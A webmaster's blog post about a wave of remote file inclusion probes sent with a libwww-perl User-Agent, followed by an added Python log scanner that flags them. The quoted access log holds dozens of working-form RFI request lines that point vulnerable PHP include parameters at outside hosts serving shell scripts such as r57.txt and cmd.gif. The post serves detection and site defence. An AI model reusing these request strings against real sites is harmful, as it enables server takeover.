libwww-perl has turned into a dedicated unauthorized-access tool (´Α`) Go away

About libwww-perl: lately it seems to be abused for unauthorized access a lot.
This site, too, gets hosts with their User-Agent set to libwww-perl requesting strange URIs in large numbers.
It's super annoying!! (-∀ー#)

It looks like they are hunting for vulnerabilities in blog sites and the like. If you run a blog, be careful.

The access log looks like this:

"GET / HTTP/1.1"
"GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://213.133.108.122/alex.gif? HTTP/1.1"
"GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://realhack.altervista.org/iniez.txt? HTTP/1.1"
"GET //bb_func_txt.php?pathToFiles=http://213.133.108.122/alex.gif? HTTP/1.1"
"GET //forum.php?cfg_file=1&fpath=http://goblok.10e.net/r57.txt?? HTTP/1.1"
"GET //inc/output/news_theme1.php?abs_path=http://213.133.108.122/alex.gif? HTTP/1.1"
"GET //include/menu_builder.php?config[page_dir]=http://www.freewebtown.com/pks2/sp.txt? HTTP/1.1"
"GET //includes/dbal.php?eqdkp_root_path=http://213.133.108.122/alex.gif? HTTP/1.1"
"GET //master.php?root_path=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET //sw/index_sw.php?doc_directory=http://utenti.lycos.it/fvmatoz/r.jpg? HTTP/1.1"
"GET //template.php?actionsPage=http://goblok.10e.net/r57.txt?? HTTP/1.1"
"GET /@rfiscanhttp://www.sedjk-pro.com/new.txt? HTTP/1.1"
"GET /admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://clubmusic.caucasus.net/administrator/cmd.gif? HTTP/1.1"
"GET /admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.clubmusic.caucasus.net/administrator/cmd.gif? HTTP/1.1"
"GET /admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://tinypath.com/sdy/test/iso.txt? HTTP/1.0"
"GET /admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://realhack.altervista.org/iniez.txt? HTTP/1.1"
"GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/administrator/cmd.gif? HTTP/1.1"
"GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /forum/track.php?path=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /functions.php?pmp_rel_path=http://goblok.10e.net/r57.txt?? HTTP/1.1"
"GET /functions.php?pmp_rel_path=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /images/smileys/smileys_packs.php?smileys_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /include/copyright.php?tsep_config[absPath]=%20%22Powered%20Byhttp://www.jizni-cechy.cz/unknowns/cmd.txt?? HTTP/1.1"
"GET /include/disp_form.php3?cfg_include_dir=http://clubmusic.caucasus.net/administrator/cmd.gif? HTTP/1.1"
"GET /include/disp_form.php3?cfg_include_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.0"
"GET /include/disp_form.php3?cfg_include_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /include/disp_smileys.php3?cfg_include_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.0"
"GET /include/disp_smileys.php3?cfg_include_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /include/index.php3?cfg_include_dir=http://clubmusic.caucasus.net/administrator/cmd.gif? HTTP/1.1"
"GET /include/index.php3?cfg_include_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /include/little_news.php3?cfg_include_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /index.php?classified_path=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /module/forum/main.php?id=1&main_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.0"
"GET /module/forum/main.php?id=1&main_dir=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /process.php?DEFAULT_SKIN=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /register.php?base_dir=http://clubmusic.caucasus.net/administrator/cmd.gif? HTTP/1.1"
"GET /template/purpletech/base_include.php?page=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /track.php?path=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /webyep-system/programm/elements/WYGalleryElement.php?webyep_sIncludePath=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://goblok.10e.net/r57.txt?? HTTP/1.1"
"GET /webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /webyep-system/programm/lib/WYApplication.php?webyep_sIncludePath=http://www.olimpicatkdrende.net/tab/cmd.gif? HTTP/1.1"
"GET /webyep-system/programm/lib/WYDocument.php?webyep_sIncludePath=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"
"GET /webyep-system/programm/webyep.php?webyep_sIncludePath=http://tinypath.com/sdy/test/iso.txt? HTTP/1.1"

The User-Agent is nothing but libwww-perl... though the versions differ slightly.

"libwww-perl/5.53"
"libwww-perl/5.64"
"libwww-perl/5.65"
"libwww-perl/5.69"
"libwww-perl/5.75"
"libwww-perl/5.76"
"libwww-perl/5.79"
"libwww-perl/5.803"
"libwww-perl/5.805"
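
The probe requests in the log above share one shape: a remote http:// URL placed in a query parameter (or directly in the path), sent with a libwww-perl User-Agent. The following Python code is an added example, not part of the original post; it flags that pattern in combined-format access log lines and tallies hits per source address. The sample lines, addresses, host name and function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Combined log format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (?P<target>\S+)[^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
# A remote URL anywhere in a decoded value; some probes prefix it with junk text.
REMOTE_RE = re.compile(r'(?:https?|ftp)://', re.I)

# Constructed sample lines (documentation addresses, placeholder host and timestamps).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2007:00:00:01 +0900] "GET //administrator/components/com_example/help.php?mosConfig_absolute_path=http://files.example/probe.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"',
    '192.0.2.10 - - [01/Jan/2007:00:00:02 +0900] "GET /include/copyright.php?tsep_config[absPath]=%20%22Powered%20Byhttp://files.example/probe.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"',
    '198.51.100.7 - - [01/Jan/2007:00:00:03 +0900] "GET /@rfiscanhttp://files.example/probe.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.65"',
    '203.0.113.5 - - [01/Jan/2007:00:00:04 +0900] "GET /index.php?page=2&sort=date HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2007:00:00:05 +0900] "GET / HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"',
]

def rfi_params(target):
    """Return the names of query parameters whose decoded value embeds a remote URL."""
    path, _, query = target.partition("?")
    hits = []
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if REMOTE_RE.search(unquote(value)):
            hits.append(unquote(name))
    # Some probes carry the URL in the path itself, with no parameter name.
    if REMOTE_RE.search(unquote(path)):
        hits.append("<path>")
    return hits

def summarize(lines):
    """Count suspicious requests per source IP; unparseable lines are skipped."""
    per_ip, findings = Counter(), []
    for line in lines:
        m = LOG_RE.match(line)
        params = rfi_params(m["target"]) if m else []
        if not params:
            continue  # note: legitimate redirect-style parameters would also match
        per_ip[m["ip"]] += 1
        findings.append((m["ip"], params, "libwww-perl" in m["ua"].lower()))
    return per_ip, findings

if __name__ == "__main__":
    counts, _ = summarize(SAMPLE)
    for ip, n in counts.most_common():
        print(n, ip)
```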

The sources (senders) look like this... Of course, I dropped them at the firewall. (・∀・)ネニチリーン
Oh... "ns.hatena.ne.jp." is mixed in there too. Well, whatever.
